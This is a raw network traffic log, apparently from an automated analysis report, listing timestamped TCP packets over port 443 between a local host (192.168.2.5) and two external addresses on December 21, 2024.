Dec 21, 2024 13:17:14.961275101 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.965173960 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.965235949 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.965292931 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.965341091 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.965354919 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.965373993 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.965399981 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.965409040 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.965428114 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:15.419471025 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:15.419522047 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:15.419636011 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:15.419970989 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:15.419986010 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:16.714063883 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:16.714155912 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:16.735424042 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:16.735454082 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:16.735670090 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:16.735681057 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.219980001 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.220076084 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.220113993 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.220148087 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.220176935 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.220181942 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.220207930 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.220243931 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.220264912 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.246006966 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.249883890 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.249910116 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.249967098 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.250418901 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.253865004 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.256419897 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.256485939 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.256496906 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.256555080 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.339754105 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.341892958 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.411895037 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.413897038 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.413924932 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.413996935 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.416384935 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.416465044 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.418253899 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.421865940 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.426006079 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.428906918 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.428921938 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.428981066 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.434355974 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.437872887 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.437886000 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.437961102 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.442735910 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.445864916 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.445871115 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.445918083 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.451472998 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.452958107 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.459521055 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.461870909 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.461877108 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.461927891 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.467828035 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.467914104 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.467958927 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.468364954 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.476270914 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.477010965 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.477024078 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.477085114 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.483817101 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.483916044 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.490840912 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.493879080 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.493915081 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.497872114 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.497884035 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.497906923 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.497981071 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.504846096 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.504910946 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.504935980 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.505028963 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.511912107 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.513067007 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.640697956 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.640712976 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.640758991 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.640790939 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.640805960 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.640846968 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.640866041 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.669524908 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.669557095 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.669614077 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.669683933 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.669723034 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.669745922 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.694544077 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.694576979 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.694628954 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.694694042 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.694735050 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.694757938 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.813116074 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.813152075 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.813225031 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.813292027 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.813342094 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.813363075 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.831846952 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.831878901 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.831980944 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.832010984 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.832099915 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.851761103 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.851792097 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.851867914 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.851878881 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.851916075 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.851938009 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.871004105 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.871037006 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.871119976 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.871174097 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.871203899 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.871354103 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.887696981 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.887732983 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.887820005 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.887861967 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.887912989 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.887913942 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.906974077 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.907008886 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.907052994 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.907107115 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.907143116 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.907248974 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.925092936 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.925163984 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.925215960 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.925244093 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:17.925311089 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:17.925312042 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.013046980 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.013114929 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.013207912 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.013278008 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.013312101 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.013359070 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.025288105 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.025322914 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.025373936 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.025408030 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.025444031 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.025465965 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.038372993 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.038408041 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.038466930 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.038536072 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.038573980 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.038669109 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.051340103 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.051368952 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.051430941 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.051466942 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.051534891 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.062477112 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.062510967 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.062551975 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.062561989 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.062587976 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.062612057 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.074470997 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.074505091 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.074568987 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.074609995 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.074628115 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.074661970 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.085695982 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.085731030 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.085768938 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.085813999 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.085844994 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.085865974 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.195698977 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.195733070 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.195789099 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.195827007 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.195847034 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.195908070 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.203355074 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.203377008 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.203496933 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.203496933 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.203509092 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.203560114 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.211726904 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.211749077 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.211786985 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.211796045 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.211819887 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.211847067 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.219767094 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.219789982 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.219834089 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.219840050 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.219885111 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.219899893 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.224195004 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.224237919 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.224272013 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.224276066 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.224291086 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:18.224323034 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.224347115 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.263999939 CET	49705	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:18.264024019 CET	443	49705	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:20.764369011 CET	49709	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:20.764415026 CET	443	49709	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:20.764615059 CET	49709	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:20.766033888 CET	49709	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:20.766046047 CET	443	49709	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:21.986772060 CET	443	49709	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:21.986851931 CET	49709	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:22.051582098 CET	49709	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:22.051615000 CET	443	49709	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:22.051939964 CET	443	49709	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:22.132844925 CET	49709	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:22.430541039 CET	49709	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:22.430541039 CET	49709	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:22.430757046 CET	443	49709	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:23.478157043 CET	443	49709	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:23.478269100 CET	443	49709	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:23.478390932 CET	49709	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:23.492101908 CET	49709	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:23.492119074 CET	443	49709	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:23.534964085 CET	49715	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:23.535016060 CET	443	49715	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:23.535096884 CET	49715	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:23.535541058 CET	49715	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:23.535556078 CET	443	49715	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:24.747699022 CET	443	49715	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:24.747780085 CET	49715	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:24.749377012 CET	49715	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:24.749403954 CET	443	49715	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:24.749671936 CET	443	49715	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:24.751332045 CET	49715	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:24.751369953 CET	49715	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:24.751420021 CET	443	49715	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:25.519681931 CET	443	49715	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:25.519705057 CET	443	49715	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:25.519742012 CET	443	49715	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:25.519778013 CET	443	49715	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:25.519783020 CET	49715	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:25.519817114 CET	443	49715	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:25.519872904 CET	443	49715	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:25.519886017 CET	49715	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:25.519903898 CET	443	49715	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:25.519948959 CET	49715	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:25.534440041 CET	443	49715	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:25.534523964 CET	443	49715	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:25.534594059 CET	49715	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:25.534603119 CET	443	49715	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:25.534634113 CET	443	49715	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:25.534667969 CET	49715	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:25.635303020 CET	49715	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:25.635351896 CET	443	49715	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:25.711970091 CET	443	49715	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:25.712075949 CET	443	49715	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:25.712135077 CET	49715	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:25.712148905 CET	443	49715	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:25.715421915 CET	443	49715	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:25.715519905 CET	49715	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:25.715531111 CET	443	49715	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:25.715692997 CET	443	49715	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:25.715765953 CET	49715	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:25.715871096 CET	49715	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:25.715879917 CET	443	49715	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:25.715892076 CET	49715	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:25.715898037 CET	443	49715	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:25.844064951 CET	49731	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:25.844104052 CET	443	49731	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:25.844436884 CET	49731	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:25.844523907 CET	49731	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:25.844535112 CET	443	49731	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:27.065819979 CET	443	49731	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:27.065927982 CET	49731	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:27.312617064 CET	49731	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:27.312635899 CET	443	49731	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:27.313121080 CET	443	49731	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:27.321050882 CET	49731	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:27.321227074 CET	49731	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:27.321260929 CET	443	49731	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:28.154067993 CET	443	49731	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:28.154306889 CET	443	49731	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:28.155046940 CET	49731	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:28.155502081 CET	49731	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:28.155517101 CET	443	49731	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:28.178467035 CET	49741	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:28.178508997 CET	443	49741	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:28.178617001 CET	49741	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:28.178958893 CET	49741	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:28.178971052 CET	443	49741	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:29.394547939 CET	443	49741	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:29.394630909 CET	49741	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:29.396408081 CET	49741	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:29.396420002 CET	443	49741	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:29.397268057 CET	443	49741	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:29.398459911 CET	49741	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:29.398669958 CET	49741	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:29.398708105 CET	443	49741	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:29.399885893 CET	49741	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:29.447331905 CET	443	49741	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:30.258472919 CET	443	49741	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:30.258553982 CET	443	49741	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:30.258892059 CET	49741	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:30.259016037 CET	49741	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:30.259035110 CET	443	49741	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:30.335896015 CET	49750	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:30.335937023 CET	443	49750	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:30.336085081 CET	49750	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:30.336431980 CET	49750	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:30.336447001 CET	443	49750	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:31.548125029 CET	443	49750	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:31.548202038 CET	49750	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:31.549895048 CET	49750	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:31.549910069 CET	443	49750	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:31.550190926 CET	443	49750	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:31.560030937 CET	49750	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:31.560219049 CET	49750	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:31.560287952 CET	443	49750	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:31.560376883 CET	49750	443	192.168.2.5	172.67.197.170
